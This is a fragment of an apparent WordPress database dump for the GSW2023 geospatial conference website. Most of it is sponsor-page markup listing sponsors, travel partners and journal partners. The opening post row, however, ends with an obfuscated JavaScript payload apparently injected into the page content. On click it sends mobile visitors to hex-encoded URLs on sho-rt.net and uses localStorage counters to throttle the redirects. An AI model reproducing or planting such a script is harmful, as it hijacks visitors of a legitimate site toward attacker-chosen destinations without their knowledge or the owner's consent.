_0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-16 00:00:38','2023-08-16 00:00:38','',3066,'https://gsw2023.com/?p=5231',0,'revision','',0),
(5232,1,'2023-08-16 00:01:22','2023-08-16 00:01:22','<p>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #0000ff;\"><strong>Under the Auspices of </strong></span><br />\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>Prime Minister of the Arab Republic of Egypt</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\n<p>&nbsp;</p>\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Platinum Sponsors</span></strong></h4>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692141731843{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a></p>\n<p>&nbsp;</p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692141731943{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" 